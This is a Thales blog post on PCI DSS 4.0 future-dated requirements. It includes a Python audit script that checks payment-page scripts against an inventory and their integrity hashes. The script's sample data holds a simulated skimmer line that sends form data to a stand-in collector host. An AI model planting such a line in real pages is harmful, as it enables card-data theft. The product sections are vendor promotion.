THALES BLOG

The Clock is Ticking: Are You Ready for PCI DSS 4.0?

March 27, 2025

Romain Deslorieux | Director, Strategic Partnerships | Thales

The March 31, 2025 deadline for PCI DSS 4.0 compliance is fast approaching. If you’re fully prepared—fantastic! But if you’re still working through the final steps, don’t worry—you’re not alone. Meeting the new “future-dated” requirements can feel overwhelming, but compliance is within reach with the right approach and the right solutions. Let’s break down what’s changing, why it matters, and how Thales and Imperva (a Thales company) can help you confidently navigate the final stretch.

Why is PCI DSS 4.0 Compliance Important?

Complying with PCI DSS 4.0 is important for several reasons. Obviously, there are financial consequences for non-compliance: the card brands levy fines through acquiring banks, commonly cited as ranging from $5,000 to $100,000 a month, and an acquirer can ultimately withdraw a merchant’s ability to accept cards. But it’s important not to view PCI DSS solely as a regulatory burden; it is also a business enabler.

A staggering number of consumers make card payments every day, and you want them to be making those payments through your services. A seamless user experience matters, but ultimately consumers will only use your services if they’re confident you’ll protect their data: the Thales 2024 Consumer Digital Trust Index found that across industries, consumers place high importance on both a smooth online experience and data security. PCI DSS compliance demonstrates that you can be trusted to handle cardholder data.

Understanding PCI DSS 4.0’s Future-Dated Requirements

Although PCI DSS 4.0 was first released in March 2022, its future-dated requirements were classified as “best practice” until they come into force on March 31, 2025. The PCI Security Standards Council (SSC) staged them this way because it recognized that these requirements might require significant changes to an organization’s systems, processes, or technologies. From that date on, they are assessed like every other requirement.

However, again, don’t stress: Thales and Imperva’s solutions can help you meet many of these requirements. But we’ll get to that later. First, let’s look at what those future-dated requirements are:

  • Expanded MFA Implementation (Req. 8.4.2): MFA will be required for all access into the Cardholder Data Environment (CDE), not just for remote network access and non-console administrative access as in v3.2.1. This means implementing MFA for both local and remote access to systems within the CDE, for every user account.
  • Increased Password Length (Req. 8.3.6): The minimum password length increases from seven to twelve characters, containing both letters and numbers, unless a system does not support this length, in which case the minimum is eight characters.
  • Password Management (Req. 8.6.2 and 8.6.3): Passwords for application and system accounts used for interactive login must not be hard-coded into scripts, configuration files, or bespoke source code, and those passwords must be changed periodically, at a frequency justified by the organization’s own risk analysis.
  • Automated Application Protection (Req. 6.4.2): Public-facing web applications must be protected by an automated technical solution that continually detects and prevents web-based attacks, such as a web application firewall; periodic manual or automated vulnerability reviews will no longer suffice on their own.
  • Script Management (Req. 6.4.3 and 11.6.1): Every script loaded and executed in the consumer’s browser on a payment page must be inventoried with a written justification, confirmed as authorized, and protected for integrity, and a change- and tamper-detection mechanism must alert on unauthorized modification of the payment page’s content and HTTP headers at least weekly.
  • Annual Reviews (Req. 12.3.3): Cryptographic cipher suites and protocols in use must be documented and formally reviewed at least every twelve months, including active monitoring of industry cryptography trends, with a plan to respond to anticipated changes. The transition to post-quantum cryptography is the clearest reason to build crypto agility in now.
  • Enhanced Training Programs (Req. 12.6.2 and 12.6.3): Security awareness programs must be reviewed at least every twelve months and updated as needed to address current threats, including phishing, social engineering, and acceptable use of end-user technologies.
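The script-management requirement is the one most teams have never had to operationalize before, so here is what an inventory-and-integrity check looks like in practice. This is an added example written for this page, not code from Thales, Imperva, or the PCI SSC; the hostnames, script bodies, inventory entries, and the `report(...)` line that simulates a tampered script are all constructed, and in production the `fetched` bodies would be pulled from the origin or CDN at audit time rather than embedded. It parses a payment page, flags any `<script>` that is not in the authorized inventory, checks that each external script carries a Subresource Integrity attribute matching the inventory, and re-hashes the served body to catch a script that was approved but later modified.

```python
"""Added example: audit a payment page's scripts against an authorized inventory.

PCI DSS 4.0 req. 6.4.3 wants every payment-page script inventoried with a
written justification, confirmed as authorized, and integrity-assured. This
checks all three offline: parse the page, compare each <script> with the
inventory, and verify Subresource Integrity (SRI) hashes against the bodies.
"""
import base64
import hashlib
from html.parser import HTMLParser


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Return an SRI token such as 'sha384-<base64 digest>' for a script body."""
    return f"{algo}-{base64.b64encode(hashlib.new(algo, body).digest()).decode('ascii')}"


class _ScriptCollector(HTMLParser):
    """Collect each <script> on the page: src, integrity attribute, inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._inline = None  # the inline <script> entry being filled, if any

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            entry = {"src": a.get("src"), "integrity": a.get("integrity"), "body": ""}
            self.scripts.append(entry)
            self._inline = entry if entry["src"] is None else None

    def handle_data(self, data):
        if self._inline is not None:
            self._inline["body"] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self._inline = None


def audit_payment_page(html: str, inventory: dict, fetched: dict) -> list:
    """Return one finding per problem; an empty list means every script passes.

    inventory: {src: {"justification": ..., "sri": ...}} for external scripts and
               {"inline:<sri token>": {...}} for approved inline blocks.
    fetched:   {src: bytes} script bodies as actually served to the browser
               (constructed here; in practice fetched from the origin/CDN).
    """
    findings = []
    parser = _ScriptCollector()
    parser.feed(html)
    for s in parser.scripts:
        if s["src"] is None:                      # inline script: authorize by content hash
            token = "inline:" + sri_hash(s["body"].strip().encode())
            if token not in inventory:
                findings.append(f"unauthorized inline script ({token})")
            continue
        entry = inventory.get(s["src"])
        if entry is None:                         # not in the inventory at all
            findings.append(f"unauthorized script {s['src']}")
            continue
        if not s["integrity"]:                    # browser cannot enforce integrity
            findings.append(f"missing integrity attribute on {s['src']}")
        elif s["integrity"] != entry["sri"]:
            findings.append(f"integrity attribute on {s['src']} differs from inventory")
        body = fetched.get(s["src"])
        if body is None:
            findings.append(f"could not fetch {s['src']}")
        elif sri_hash(body) != entry["sri"]:      # served content changed since approval
            findings.append(f"served content of {s['src']} differs from approved hash")
    return findings


# --- constructed sample data (hypothetical hosts and scripts) ---
CHECKOUT_JS = b"function tokenize(pan){return fetch('/tokenize',{method:'POST',body:pan});}"
CARD_JS_APPROVED = b"function formatPan(v){return v.replace(/\\s+/g,'');}"
CARD_JS_SERVED = CARD_JS_APPROVED + b"\n/* unauthorized change */ report('https://collector.invalid/', document.forms[0]);"
INLINE_OK = "window.checkoutConfig = {currency: 'EUR'};"

INVENTORY = {
    "https://pay.example.com/js/checkout.js": {"justification": "tokenizes the PAN before submit", "sri": sri_hash(CHECKOUT_JS)},
    "https://pay.example.com/js/card.js": {"justification": "formats the card number field", "sri": sri_hash(CARD_JS_APPROVED)},
    "inline:" + sri_hash(INLINE_OK.encode()): {"justification": "checkout configuration"},
}
FETCHED = {
    "https://pay.example.com/js/checkout.js": CHECKOUT_JS,
    "https://pay.example.com/js/card.js": CARD_JS_SERVED,  # tampered after approval
}
PAYMENT_PAGE = f"""<html><body><form><input name="pan"></form>
<script src="https://pay.example.com/js/checkout.js" integrity="{INVENTORY['https://pay.example.com/js/checkout.js']['sri']}" crossorigin="anonymous"></script>
<script src="https://pay.example.com/js/card.js" integrity="{INVENTORY['https://pay.example.com/js/card.js']['sri']}" crossorigin="anonymous"></script>
<script src="https://cdn.example.net/analytics.js"></script>
<script>{INLINE_OK}</script>
<script>document.forms[0].addEventListener('submit', e => console.log(e));</script>
</body></html>"""

if __name__ == "__main__":
    for f in audit_payment_page(PAYMENT_PAGE, INVENTORY, FETCHED):
        print("FINDING:", f)
```

Run against the constructed page this reports three findings: the approved `card.js` whose served body no longer matches its hash, the uninventoried analytics script, and the second inline block that nobody authorized. Two design points matter for an assessor: the inventory carries a justification per script, which is what 6.4.3 asks you to document, and the re-hash of the served body is what distinguishes "we set an SRI attribute once" from the ongoing tamper detection 11.6.1 expects, since an attacker who can edit the page can also edit the attribute.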

Solutions That Can Help

If your organization has yet to comply with PCI DSS 4.0, Thales and Imperva solutions can help address almost all the future-dated requirements. Here’s how.

Data Security

Thales Data Security solutions are integral to ensuring PCI DSS 4.0 compliance. Our solutions discover, classify, and protect card data with encryption and tokenization, all underpinned by FIPS 140-validated key management, so that stored primary account numbers are unreadable wherever they are kept.

Moreover, CipherTrust Transparent Encryption secures data at rest, wherever it resides, with access policies that keep even privileged system administrators from reading cardholder data in the clear. We also provide real-time monitoring and machine-learning anomaly detection to identify potential threats, with automated remediation workflows to act on what is found. Together, these solutions protect and encrypt card data so you can achieve seamless PCI DSS 4.0 compliance.

Application Protection

Imperva’s automated application and API protection platform secures web applications and APIs from attackers. It combines WAF, bot management, API security, and runtime protection to defend against OWASP Top 10 threats, bot attacks, and API vulnerabilities, ensuring application availability, data protection, and compliance with PCI DSS 4.0.

What’s more, the platform includes Client-Side Protection, giving you visibility into both the third-party scripts your websites load and your own first-party scripts as they execute in the browser on your protected sites. This means you can easily inventory and authorize the scripts running on the critical paths where sensitive customer data is entered, detect changes to them, and meet the payment-page script requirements of PCI DSS 4.0.

Identity and Access Management (IAM)

Thales’ Identity and Access Management (IAM) solutions help meet the expanded MFA implementation requirement. Our solutions provide diverse authentication methods (including passwordless and risk-based), granular access control, and seamless integration across all CDE systems, bridging the local/remote access gap and simplifying compliance.

Passwordless authentication ditches passwords altogether, enhances security, improves the user experience, and removes the password-length and password-rotation requirements from the picture for the accounts that use it. Thales Passwordless 360 offers seamless, secure login with biometrics, FIDO2 keys, and more, eliminating the phishing and credential-stuffing risks that passwords carry.

For more information on PCI DSS 4.0 and how Thales and Imperva solutions can help you comply before the March 31st deadline, check out our respective information pages here and here.